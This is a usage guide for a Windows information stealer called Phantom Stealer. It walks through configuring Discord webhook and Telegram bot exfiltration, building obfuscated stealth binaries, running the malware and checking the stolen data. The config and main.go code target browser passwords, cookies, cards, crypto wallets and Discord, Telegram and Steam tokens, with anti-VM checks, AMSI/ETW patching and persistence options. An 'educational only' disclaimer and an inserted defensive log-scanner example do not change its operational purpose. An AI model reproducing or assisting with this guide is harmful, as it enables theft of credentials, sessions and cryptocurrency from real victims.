EDUCATIONAL PURPOSES ONLY - This software is provided for security research and malware analysis only. Unauthorized access to computer systems is illegal. See the Legal Notice for full terms.

Overview

Phantom Stealer is a Windows information stealer written in Go that demonstrates credential theft techniques for security research. This guide will walk you through cloning, configuring, building, and running the project.
1. Clone the Repository

First, clone the Phantom Stealer repository to your local machine:
git clone https://github.com/yourusername/phantom-stealer.git
cd phantom-stealer
Ensure you have Git installed on your system before proceeding.
2. Install Requirements

Phantom Stealer requires the following dependencies:
Required:
  • Go 1.21 or higher
  • Windows OS (uses Windows-specific APIs)
  • GCC compiler (for CGO/SQLite support)
  • Git
Optional:
  • Garble for code obfuscation
  • UPX for binary compression
Install dependencies:
# Install Go dependencies
go mod tidy

# Install Garble (optional, for obfuscation)
go install mvdan.cc/garble@latest
CGO must be enabled for SQLite support. This is required for browser database decryption.
3. Configure the Stealer

Edit config/config.go to customize your build. At minimum, you must set an exfiltration method:

Basic Configuration

config/config.go
// C2 Configuration - Set your webhook/bot details
var (
    // Discord webhook - PRIMARY exfil method
    // format: https://discord.com/api/webhooks/xxxxx/yyyyy
    DiscordWebhook = "https://discord.com/api/webhooks/YOUR_WEBHOOK_HERE"

    // Telegram bot - BACKUP exfil method
    TelegramToken  = "YOUR_BOT_TOKEN"
    TelegramChatID = "YOUR_CHAT_ID" // get from @userinfobot
)

Module Configuration

Enable or disable features based on your research needs:
config/config.go
// Module Toggles
var (
    StealBrowsers  = true  // passwords, cookies, cards, history
    StealCrypto    = true  // desktop + extension wallets
    StealDiscord   = true  // discord tokens
    StealTelegram  = true  // tdata session files
    StealSteam     = true  // ssfn + config files
    TakeScreenshot = true  // png screenshot
    GrabSystemInfo = true  // hostname, ip, specs, etc

    // DANGER ZONE - these are noisier
    Persistence  = false // off by default - adds to registry/startup
    SelfDestruct = false // delete exe after run

    // Anti-analysis (recommended for prod builds)
    AntiVM    = true
    AntiDebug = true
)

Build Identification

Customize the build ID to track different campaigns:
config/config.go
var (
    BuildID   = "phantom-v1.0"
    MutexName = "phantom_mtx_7f3a9b2c" // change to avoid detection
)
At least one exfiltration method (Discord or Telegram) must be configured or the stealer will fail to send data.
4. Build the Binary

Choose a build method based on your needs:

Standard Build

Basic development build with debug symbols:
go build -o phantom.exe .

Production Build

Optimized build with stripped symbols and hidden console:
go build -ldflags "-s -w -H windowsgui" -o phantom.exe .

Obfuscated Build

For maximum stealth using Garble:
garble -literals build -ldflags "-s -w -H windowsgui" -o phantom.exe .

PowerShell Build Script

Use the included PowerShell script for automated builds:
.\build.ps1 -Output phantom.exe
The PowerShell build script automatically checks for suspicious strings in the compiled binary and provides file size optimization recommendations.
5. Run the Stealer

Execute the compiled binary on your test system:
# Direct execution
.\phantom.exe

Execution Flow

When executed, Phantom Stealer performs the following operations:
  1. Environment Checks (Phase 1)
    • VM detection (VMware, VirtualBox, Hyper-V)
    • Debugger detection
    • Sandbox detection
    • AMSI/ETW patching
  2. Persistence Installation (Phase 2 - if enabled)
    • Registry Run key installation
    • Startup folder copy
  3. Data Collection (Phase 3)
    • System reconnaissance
    • Browser credential extraction
    • Crypto wallet theft
    • Token grabbing (Discord, Telegram, Steam)
    • File grabbing from Desktop/Documents/Downloads
  4. Exfiltration (Phase 4)
    • Data archival to ZIP
    • Upload to Discord webhook
    • Fallback to Telegram if Discord fails
  5. Cleanup (Phase 5 - if enabled)
    • Self-deletion
main.go
func main() {
    // PHASE 1: Environment checks
    if config.AntiVM || config.AntiDebug {
        if !evasion.RunAntiAnalysis(config.AntiVM, config.AntiDebug) {
            os.Exit(0)
        }
    }

    // PHASE 2: Persistence (optional)
    if config.Persistence {
        persist.Install(persist.Registry)
    }

    // PHASE 3: Data collection
    data := &exfil.StealerData{
        Timestamp:  time.Now(),
        BuildID:    config.BuildID,
    }
    data.SystemInfo = recon.Collect()
    data.Browsers = browsers.StealAll()
    data.Wallets = wallets.StealAll()
    data.Tokens = tokens.StealAll()

    // PHASE 4: Exfiltration
    exfil.Exfiltrate(data)

    // PHASE 5: Cleanup
    if config.SelfDestruct {
        persist.SelfDelete()
    }
}
The stealer exits silently (no output) when anti-analysis checks detect a sandbox or debugger environment.
6. Verify Exfiltration

Check your configured webhook/bot for the stolen data:

Discord Webhook Output

You’ll receive a Discord message with:
  • System information embed (hostname, IP, OS version)
  • Statistics (passwords found, tokens, wallets)
  • ZIP archive attachment containing:
    • system_info.txt - Full system details
    • passwords.txt - Extracted browser passwords
    • cookies.txt - Browser cookies
    • tokens.txt - Discord/Telegram/Steam tokens
    • wallets/ - Crypto wallet files
    • files/ - Grabbed documents
    • screenshot.png - Desktop screenshot

Telegram Bot Output

Similar to Discord but sent via Telegram Bot API with document attachment.
Data is organized in a ZIP archive named {hostname}_{timestamp}.zip for easy identification of victims.
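The exfiltration channels and the {hostname}_{timestamp}.zip naming described above are concrete things a defender can hunt for in outbound proxy logs. The following is an added example, not code from the Phantom Stealer project: a small Go scanner over constructed proxy log lines that flags ZIP uploads to a Discord webhook or the Telegram sendDocument endpoint whose archive name follows that pattern. The log line format, the hostnames in the samples and the exact timestamp format are assumptions.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)
// Alert records a proxy log line that looks like a Phantom-style upload.
type Alert struct{ Line, Channel, Archive string }
// Constructed sample lines (not from the page); assumed format: "METHOD host path attach=<name|->".
var SampleProxyLog = []string{
	"POST discord.com /api/webhooks/1234/abcd attach=DESKTOP-A1B2C3_20240101-120000.zip",
	"GET cdn.example.net /static/app.js attach=-",
	"POST api.telegram.org /bot123:ABC/sendDocument attach=LAPTOP-9F_20240101-120130.zip",
	"POST discord.com /api/webhooks/1234/abcd attach=report.pdf",
}
var reDiscordWebhook = regexp.MustCompile(`^/api/webhooks/\d+/[A-Za-z0-9_-]+`)
var reTelegramSend = regexp.MustCompile(`^/bot[^/]+/sendDocument`)
// {hostname}_{timestamp}.zip as the page describes; the exact timestamp format is assumed.
var reArchiveName = regexp.MustCompile(`^[A-Za-z0-9.-]+_[0-9T-]+\.zip$`)
// ScanProxyLog flags POSTs to a Discord webhook or Telegram sendDocument carrying such a ZIP.
func ScanProxyLog(lines []string) []Alert {
	var alerts []Alert
	for _, line := range lines {
		f := strings.Fields(line)
		if len(f) != 4 || f[0] != "POST" {
			continue // only uploads matter; malformed lines are skipped
		}
		host, path, attach := f[1], f[2], strings.TrimPrefix(f[3], "attach=")
		channel := ""
		switch {
		case (host == "discord.com" || host == "discordapp.com") && reDiscordWebhook.MatchString(path):
			channel = "discord-webhook"
		case host == "api.telegram.org" && reTelegramSend.MatchString(path):
			channel = "telegram-bot"
		default:
			continue
		}
		if reArchiveName.MatchString(attach) {
			alerts = append(alerts, Alert{line, channel, attach})
		}
	}
	return alerts
}

func main() {
	for _, a := range ScanProxyLog(SampleProxyLog) {
		fmt.Printf("%s upload of %s\n", a.Channel, a.Archive)
	}
}
```

The archive-name pattern is the weakest part of the signature; pairing the destination match with a per-host first-seen check on Discord or Telegram uploads catches renamed archives too.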

Targeted Resources

Browsers Supported

Chrome
Chromium
Edge
Brave
Opera
Opera GX
Vivaldi
Yandex

Crypto Wallets

Phantom targets 40+ crypto wallets including:
Desktop Wallets:
  • Exodus, Electrum, Atomic, Jaxx, Coinomi, Guarda
  • Bitcoin Core, Litecoin Core, Dash Core
  • Monero, ZCash, Wasabi Wallet
Browser Extension Wallets:
  • MetaMask, Phantom, Trust Wallet, Coinbase Wallet
  • TronLink, Binance Chain, Ronin, Keplr
  • 30+ additional extension wallets

Tokens & Sessions

  • Discord: Desktop client + browser sessions (all channels)
  • Telegram: tdata session files
  • Steam: SSFN files + config.vdf

Troubleshooting

Build Failures

Ensure CGO is enabled and GCC is installed:
set CGO_ENABLED=1
# Install MinGW-w64 for GCC on Windows
Install Garble using Go:
go install mvdan.cc/garble@latest
# Ensure $GOPATH/bin is in your PATH
The SQLite driver requires CGO. Verify:
go env CGO_ENABLED
# Should output: 1

Runtime Issues

Anti-analysis checks may be triggering. Build with debug mode:
config/config.go
AntiVM    = false
AntiDebug = false
Verify webhook/bot configuration:
  • Check Discord webhook URL format
  • Verify Telegram bot token and chat ID
  • Test webhook manually with curl
DPAPI decryption requires the binary to run as the target user. Browser passwords are encrypted per-user.

Next Steps

Building Guide

Learn about advanced build options, flags, and obfuscation techniques

Core Modules

Understand the module implementations and techniques

Detection & Defense

Learn how to detect and defend against this type of malware

Configuration

Explore configuration options and targets
Remember: This tool is for educational and authorized security research only. Misuse is illegal and unethical. Always obtain explicit written permission before testing on any system.
